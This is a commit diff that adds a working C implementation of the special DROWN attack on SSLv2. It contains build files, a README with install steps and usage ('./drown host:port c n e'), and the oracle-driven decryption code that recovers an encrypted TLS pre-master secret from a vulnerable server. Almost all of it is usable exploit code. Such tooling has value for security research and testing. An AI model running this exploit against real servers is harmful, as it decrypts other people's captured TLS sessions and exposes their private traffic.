Decrypt EPMS using SSLv2 oracle

Author: Tim---

Makefile

@@ -0,0 +1,12 @@
+CFLAGS=-I$(SSL_PREFIX)/include
+LDFLAGS=-Wl,-rpath,$(SSL_PREFIX)/lib -L $(SSL_PREFIX)/lib -lssl -lcrypto -ldl -lm
+OBJS=drown.o oracle.o trimmers.o decrypt.o
+
+drown: $(OBJS)
+	gcc -g -o $@ $^ $(LDFLAGS)
+
+%.o: %.c
+	gcc -g -c -o $@ $^ $(CFLAGS)
+
+clean:
+	rm drown $(OBJS)

README.md

@@ -4,6 +4,26 @@ Implementation of the special DROWN attack on SSL2
 Note : this does not cover the general DROWN attack.
 
 
+## Installation
+
+First, we need a version of OpenSSL with SSLv2 enabled. Also, if we want to make some simulations, we need a vulnerable OpenSSL (<= 1.0.1l).
+We will compile and install it on the folder /path/to/prefix :
+
+    wget https://www.openssl.org/source/openssl-1.0.1l.tar.gz
+    tar xzf openssl-1.0.1l.tar.gz
+    cd openssl-1.0.1l
+    ./config enable-ssl2 enable-weak-ciphers --openssldir=/path/to/prefix
+    make && make install
+
+Now let's compile the exploit :
+
+    git clone https://github.com/Tim---/drown
+    SSL_PREFIX=/path/to/prefix make
+
+To decrypt an encrypted pre-master secret c, using the public key (n, e) of the server at the address host:port, we will use the following command :
+
+    ./drown host:port c n e
+
 ## Passive attack
 
 In this type of attack, we can see the traffic between a server and a client using TLS.
@@ -15,17 +35,11 @@ In this case, we can decrypt some TLS sessions if :
 
 ## Simulation
 
-To simulate this scenario, we must install an old version of OpenSSL :
+To simulate this scenario, want to record some TLS handshakes between a client and a server.
+We will use the old version of OpenSSL we have installed to create a server, and initiate a lot of sessions.
+We will capture the handshakes with tshark.
 
-    wget https://www.openssl.org/source/openssl-1.0.1l.tar.gz
-    tar xzf openssl-1.0.1l.tar.gz
-    cd openssl-1.0.1l
-    ./config enable-ssl2 enable-weak-ciphers --openssldir=/path/to/prefix
-    make && make install
     cd /path/to/prefix
-
-Now, we want to record some TLS sessions. We will create a server, launch tshark to capture the packets, and initiate a lot of sessions.
-
     ./bin/openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 123
     ./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
     tshark -i lo -w handshakes.cap

decrypt.c

@@ -0,0 +1,179 @@
+#include <openssl/bn.h>
+#include <openssl/err.h>
+#include <openssl/ssl.h>
+#include "decrypt.h"
+#include "oracle.h"
+
+
+void BN_dump(BIGNUM *bn)
+{
+    printf("%s\n", BN_bn2hex(bn));
+}
+
+
+void oracle_guess(drown_ctx *dctx, BIGNUM *c, BIGNUM *k, int bsize)
+{
+    int bytesize = bsize/8-1;
+    unsigned char result[24];
+    unsigned char enc_key[256] = {0};
+
+    // Convert c to array
+    BN_bn2bin(c, enc_key + 256 - BN_num_bytes(c));
+
+    // Run the oracle
+    run_oracle_guess(dctx->hostport, bytesize, enc_key, 256, result);
+
+    // Convert m to bignum
+    BN_bin2bn(result, bytesize, k);
+}
+
+/*
+    Checks whether c is valid.
+    Returns the numbers of bits we can learn (0 if invalid).
+*/
+int oracle_valid(drown_ctx *dctx, BIGNUM *c)
+{
+    unsigned char enc_key[256] = {0};
+
+    // Convert c to array
+    BN_bn2bin(c, enc_key + 256 - BN_num_bytes(c));
+
+    // Run the oracle
+    int size = run_oracle_valid_multiple(dctx->hostport, enc_key, 256);
+
+    if(size == 0)
+        return 0;
+    else
+        return (size + 1) * 8;
+}
+
+/*
+    Finds a multiplier s, so that c * (s * l_1) ** e is valid
+    Updates c, s, mt, l, ?
+*/
+int find_multiplier(drown_ctx *dctx, BIGNUM *mt, BIGNUM *l_1, BN_CTX *ctx, BIGNUM * ss)
+{
+    BIGNUM *c = dctx->c;
+    BIGNUM *n = dctx->n;
+    BIGNUM *e = dctx->e;
+
+    BN_CTX_start(ctx);
+    BIGNUM * inc = BN_CTX_get(ctx);
+    BIGNUM * upperbits = BN_CTX_get(ctx);
+    BIGNUM *se = BN_CTX_get(ctx);
+    BIGNUM *l_1e = BN_CTX_get(ctx);
+    BIGNUM *cl_1e = BN_CTX_get(ctx);
+    BN_mod_exp(l_1e, l_1, e, n, ctx);
+    BN_mod_mul(cl_1e, c, l_1e, n, ctx);
+    BIGNUM * cc = BN_CTX_get(ctx);
+
+    int l = 0;
+
+    // We will try every value of s, so we will add instead of multiplying
+    // Compute our increment
+    BN_mod_mul(inc, mt, l_1, n, ctx);
+    BN_zero(mt);
+
+    // Search multiplier
+    for(unsigned long s = 1; l == 0; s++)
+    {
+        BN_mod_add(mt, mt, inc, n, ctx);
+        // Check if the upper bits are 0x0002
+        BN_rshift(upperbits, mt, 2032);
+        if(BN_is_word(upperbits, 0x0002))
+        {
+            // cc = c * (s / l) ** e
+            BN_set_word(ss, s);
+            BN_mod_exp(se, ss, e, n, ctx);
+            BN_mod_mul(cc, cl_1e, se, n, ctx);
+
+            l = oracle_valid(dctx, cc);
+        }
+    }
+
+    BN_copy(c, cc);
+
+    BN_CTX_end(ctx);
+
+    return l;
+}
+
+/*
+    We have c0 = m0 ** e (mod n)
+            m0 = PKCS_1_v1.5_pad(k)), with |k| = ksize
+    Given c0, e, n, ksize and an oracle, we try to find m0 (and succeed !)
+*/
+void decrypt(drown_ctx *dctx)
+{
+    BIGNUM *c = dctx->c;
+    BIGNUM *n = dctx->n;
+    BIGNUM *S = dctx->s;
+    BIGNUM *mt = dctx->mt;
+
+    BN_CTX *ctx = dctx->ctx;
+    BN_CTX_start(ctx);
+    BIGNUM *l_1 = BN_CTX_get(ctx);
+    BIGNUM *ss = BN_CTX_get(ctx);
+    BIGNUM *r = BN_CTX_get(ctx);
+
+    // mt is our current approximation of m
+    // u marks the highest known bit
+    // l marks the lowest unknown bit
+
+    // At the beginning, we have
+    //         u                              l
+    // m  = 0002???????????????????????????????00gggggggg
+    // where g is the bits of m0 (found by the oracle)
+
+
+    int l = oracle_valid(dctx, c);
+    oracle_guess(dctx, c, mt, l);
+    int u = 2032;
+    BN_set_bit(mt, 2033);
+
+
+
+    // Repeat while we don't know all the bits
+    while(u > l)
+    {
+        // We know l low bits, so we know that for the next mt, we will know approximately l more upper bits
+        u -= l;
+
+        // Compute l_1 = 2**(-l)
+        BN_lshift(l_1, BN_value_one(), l);
+        BN_mod_inverse(l_1, l_1, n, ctx);
+
+        // Find a multiplier
+        l = find_multiplier(dctx, mt, l_1, ctx, ss);
+
+        // Remember our multiplier
+        BN_mod_mul(S, S, ss, n, ctx);
+        BN_mod_mul(S, S, l_1, n, ctx);
+
+        // We learnt approximately l bits.
+        // However, we're multiplying by s so we're not sure of |s| + 1 bits
+        u += BN_num_bits(ss) + 1;
+        // Another gotcha : we must remove 01*, because they may change by addition
+        while(BN_is_bit_set(mt, u))
+            u++;
+        u++;
+        // Be sure that u and l won't collide
+        if(u < l)
+            u = l;
+        // Great ! We know u, so we can clear the low bits
+        BN_rshift(mt, mt, u);
+        BN_lshift(mt, mt, u);
+
+        // Guess the low bits
+        oracle_guess(dctx, c, r, l);
+        BN_add(mt, mt, r);
+
+        BN_print_fp(stderr, mt);
+        fprintf(stderr, "\n");
+
+    }
+
+    BN_CTX_end(ctx);
+}
+
+

decrypt.h

@@ -0,0 +1,8 @@
+#ifndef DECRYPT_H
+#define DECRYPT_H
+
+#include "drown.h"
+
+void decrypt(drown_ctx *dctx);
+
+#endif

drown.c

@@ -0,0 +1,98 @@
+#include <openssl/bn.h>
+#include <openssl/err.h>
+#include <openssl/ssl.h>
+#include "drown.h"
+#include "trimmers.h"
+#include "decrypt.h"
+
+
+void drown_new(drown_ctx * dctx)
+{
+    dctx->ctx = BN_CTX_new();
+    SSL_ASSERT(dctx->ctx != NULL);
+
+    dctx->n = BN_new();
+    SSL_ASSERT(dctx->n != NULL);
+
+    dctx->e = BN_new();
+    SSL_ASSERT(dctx->e != NULL);
+
+    dctx->c = BN_new();
+    SSL_ASSERT(dctx->c != NULL);
+
+    dctx->s = BN_new();
+    SSL_ASSERT(dctx->s != NULL);
+
+    dctx->mt = BN_new();
+    SSL_ASSERT(dctx->mt != NULL);
+}
+
+void drown_free(drown_ctx * dctx)
+{
+    BN_free(dctx->mt);
+    BN_free(dctx->s);
+    BN_free(dctx->c);
+    BN_free(dctx->e);
+    BN_free(dctx->n);
+    BN_CTX_free(dctx->ctx);
+}
+
+int main(int argc, char *argv[])
+{
+    int res;
+
+    // Initialize OpenSSL
+    SSL_library_init();
+    SSL_load_error_strings();
+
+    // Create global context
+    drown_ctx dctx;
+    drown_new(&dctx);
+
+    // Read arguments
+    if(argc != 5)
+    {
+        fprintf(stderr, "Usage : %s host:port c n e\n", argv[0]);
+    }
+
+    // Initialize research parameters
+    dctx.hostport = argv[1];
+
+    res = BN_hex2bn(&dctx.c, argv[2]);
+    MY_ASSERT(res != 0, "c is not a valid hexadecimal string");
+
+    res = BN_hex2bn(&dctx.n, argv[3]);
+    MY_ASSERT(res != 0, "n is not a valid hexadecimal string");
+
+    res = BN_hex2bn(&dctx.e, argv[4]);
+    MY_ASSERT(res != 0, "e is not a valid hexadecimal string");
+
+    BN_one(dctx.s);
+
+    // Create some trimmers
+
+    trimmers_t trimmers;
+    trimmers_new(&trimmers, 40);
+
+    if(!find_trimmer(&dctx, &trimmers))
+    {
+        fprintf(stderr, "Could not find a valid trimmer\n");
+        exit(EXIT_FAILURE);
+    }
+
+    decrypt(&dctx);
+
+    // Try to decrypt the message
+    BN_mod_inverse(dctx.s, dctx.s, dctx.n, dctx.ctx);
+    BN_mod_mul(dctx.mt, dctx.mt, dctx.s, dctx.n, dctx.ctx);
+
+    printf("And the winner is : ");
+    BN_print_fp(stdout, dctx.mt);
+    printf("\n");
+
+
+    trimmers_free(&trimmers);
+    drown_free(&dctx);
+
+    return 0;
+}

drown.h

@@ -0,0 +1,33 @@
+#ifndef DROWN_H
+#define DROWN_H
+
+#include <openssl/bn.h>
+
+/*
+    Global context of the drown search.
+
+    At the beginning, we need to know :
+      * c, the ciphertext we are trying to decrypt ;
+      * hostport, the address for the oracle to connect, in the form "host:port" ;
+      * n, the modulus of the public key ;
+      * e, the exponent of the private key ;
+*/
+typedef struct
+{
+    char *hostport;
+    BIGNUM *n;
+    BIGNUM *e;
+    BIGNUM *c;
+    BIGNUM *s;
+    BIGNUM *mt;
+    BN_CTX *ctx;
+} drown_ctx;
+
+void drown_new(drown_ctx * dctx);
+void drown_free(drown_ctx * dctx);
+
+#define SSL_ASSERT(cond) if(!(cond)) { ERR_print_errors_fp(stderr); exit(EXIT_FAILURE); }
+#define MY_ASSERT(cond, error) if(!(cond)) { fprintf(stderr, "ERROR : " error "\n"); exit(EXIT_FAILURE); }
+
+
+#endif